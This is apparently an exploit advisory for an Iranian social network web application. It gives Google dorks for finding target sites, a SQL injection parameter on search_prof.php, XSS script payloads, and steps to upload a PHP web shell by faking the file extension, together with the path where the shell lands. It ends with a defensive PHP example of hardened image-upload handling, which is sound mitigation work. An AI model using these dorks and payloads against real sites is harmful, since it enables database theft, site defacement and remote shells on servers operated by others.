##########################################################
# Title : Iranian Social Network Multiple Exploit
# Date : 12 April 2018
# Tested on : Ubuntu/Windows 10
# Google Dork : inurl:/register.php intitle:شبکه اجتماعی
# Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی
# Author : GIST
# Vendor : http://sana-net.com/
# Exploit Type : Remote
# Version : All Version
# CVE : -
###########################################################
Description :
Iranian Social Network has multiple vulnerabilities (SQLi, XSS, file upload).
An attacker can inject SQL and download the database, or upload a shell.
To use these vulnerabilities, you first have to register with fake information.
Sql Injection :
Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219'
Request Method : Post
-- response --
HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Thu, 10 Mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Xss :
URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219
commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script>
File Upload :
URL : /editprofilepic.php
Method : Post
Rename the .php shell to .jpg, select it for upload, then change the file name back to .php in the request with Live HTTP Headers.
Directory Shell : site.com/images/users/shell.php
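
Mitigation sketch for the file upload issue above, added here as an example and not taken from the vendor's code: the server ignores the client-supplied file name and type, checks the content, re-encodes the image, and picks the stored name and extension itself. The field name "pic", the storage path, the function name store_avatar() and the use of PHP 7+ with the GD extension are assumptions.

```php
<?php
// Added illustration: hardened avatar upload handling.
// AVATAR_DIR, MAX_BYTES, the "pic" field and store_avatar() are assumed names.

const AVATAR_DIR = '/var/www/uploads/avatars'; // assumed path, served as static files only
const MAX_BYTES  = 2 * 1024 * 1024;            // assumed size limit
const ALLOWED    = ['image/jpeg', 'image/png', 'image/gif'];

function store_avatar(array $file, int $userId): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }

    // Decide the type from the bytes on disk. $file['name'] and $file['type']
    // come from the request and can be edited in transit, so they are not used.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!in_array($mime, ALLOWED, true)) {
        throw new RuntimeException('not an allowed image type');
    }

    // Re-encode with GD: only decoded pixel data reaches the stored file,
    // so anything appended to or embedded in the upload is discarded.
    $img = @imagecreatefromstring(file_get_contents($tmp));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Server-chosen name with a fixed extension; nothing from the request.
    $name = sprintf('%d_%s.jpg', $userId, bin2hex(random_bytes(8)));
    $dest = AVATAR_DIR . '/' . $name;
    if (!imagejpeg($img, $dest, 85)) {
        throw new RuntimeException('could not store image');
    }
    imagedestroy($img);
    chmod($dest, 0640);
    return $name;
}

// Typical call from the profile picture endpoint (session key is assumed):
// $stored = store_avatar($_FILES['pic'], (int) $_SESSION['user_id']);
```

The upload directory should also have no PHP handler mapped to it in the web server configuration, so a file that lands there is never executed.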